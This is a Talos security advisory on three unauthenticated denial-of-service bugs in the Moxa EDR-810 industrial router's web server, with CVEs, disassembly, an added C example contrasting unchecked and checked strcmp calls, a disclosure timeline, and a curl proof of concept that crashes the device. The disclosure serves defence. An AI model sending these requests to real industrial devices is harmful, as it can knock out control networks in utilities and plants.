Talos Intelligence: TALOS-2017-0474
Published: Apr 13, 2018 - 12:00 a.m.

Moxa EDR-810 Web Server strcmp Multiple Denial of Service Vulnerabilities

www.talosintelligence.com

CVSS2: 5 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

EPSS: 0.004 Low
Percentile: 73.6%
Summary

An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to "/MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.ini" without a cookie header to trigger this vulnerability.

Tested Versions

Moxa EDR-810 V4.1 build 17030317

Product URLs

<https://www.moxa.com/product/EDR-810.htm>

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Details

This device is marketed as a secure ICS (Industrial Control System) router. This device will likely be found in industrial environments such as power generation/distribution, water treatment, manufacturing, etc. This specific vulnerability causes the web server to crash.

A GET request to /MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.ini without a cookie header will cause the binary to crash. Authentication is not required for this vulnerability.

CVE-2017-14435 - /MOXA_CFG.ini

In the following code snippet, R0 is nil if the cookie header is not set.

.text:0001B544 LDR R0, [R11,#s1] ; s1
.text:0001B548 LDR R1, =aMoxa_cfg_ini_0 ; "/MOXA_CFG.ini"
.text:0001B54C BL strcmp

CVE-2017-14436 - /MOXA_CFG2.ini

In the following code snippet, R0 is nil if the cookie header is not set.

.text:0001B55C LDR R0, [R11,#s1] ; s1
.text:0001B560 LDR R1, =aMoxa_cfg2_ini ; "/MOXA_CFG2.ini"
.text:0001B564 BL strcmp

CVE-2017-14437 - /MOXA_LOG.ini

In the following code snippet, R0 is nil if the cookie header is not set.

.text:0001B574 LDR R0, [R11,#s1] ; s1
.text:0001B578 LDR R1, =aMoxa_log_ini_0 ; "/MOXA_LOG.ini"
.text:0001B57C BL strcmp
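
All three snippets share one pattern: a pointer that is NULL when the Cookie header is missing is passed straight to strcmp. The C code below is an added example, not Moxa firmware code and not part of the Talos advisory; it shows that pattern beside a checked form. The names header_value, match_unchecked, match_checked and handle_request, and the modelling of s1 as the Cookie header value, are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

enum { REJECT_NO_COOKIE = -1, NO_MATCH = 0, MATCH_CFG = 1, MATCH_CFG2 = 2, MATCH_LOG = 3 };

/* Hypothetical lookup: copy the value of header `name` from raw request `req` into
 * `out` and return it, or return NULL when the header is absent (case-sensitive). */
static const char *header_value(const char *req, const char *name, char *out, size_t outsz)
{
    size_t n = strlen(name);
    const char *line = strstr(req, "\r\n");           /* end of the request line */
    while (line != NULL && line[2] != '\0' && line[2] != '\r') {
        line += 2;                                     /* start of a header line */
        if (strncmp(line, name, n) == 0 && line[n] == ':') {
            const char *v = line + n + 1;
            while (*v == ' ' || *v == '\t') v++;
            size_t len = strcspn(v, "\r\n");
            if (len >= outsz) len = outsz - 1;         /* truncate, stay in bounds */
            memcpy(out, v, len);
            out[len] = '\0';
            return out;
        }
        line = strstr(line, "\r\n");
    }
    return NULL;                                       /* header not present */
}

/* Pattern seen in the disassembly: s1 reaches strcmp() unchecked. With s1 == NULL,
 * strcmp() reads through the NULL pointer: undefined behaviour, in practice a crash. */
static int match_unchecked(const char *s1)
{
    if (strcmp(s1, "/MOXA_CFG.ini") == 0)  return MATCH_CFG;
    if (strcmp(s1, "/MOXA_CFG2.ini") == 0) return MATCH_CFG2;
    if (strcmp(s1, "/MOXA_LOG.ini") == 0)  return MATCH_LOG;
    return NO_MATCH;
}

/* Checked form: reject the request before any string function sees NULL. */
static int match_checked(const char *s1)
{
    return s1 == NULL ? REJECT_NO_COOKIE : match_unchecked(s1);
}

/* Assumption: s1 is taken from the Cookie header of the raw request. */
int handle_request(const char *req)
{
    char buf[128];
    return match_checked(header_value(req, "Cookie", buf, sizeof buf));
}
```

A request without a Cookie header returns REJECT_NO_COOKIE from handle_request instead of reaching strcmp, which is the behaviour a fixed handler needs on every path that reads optional headers.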

Exploit Proof-of-Concept

curl -v 192.168.127.254/MOXA_LOG.ini
OR
curl -v 192.168.127.254/MOXA_CFG.ini
OR
curl -v 192.168.127.254/MOXA_CFG2.ini

Timeline

2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release
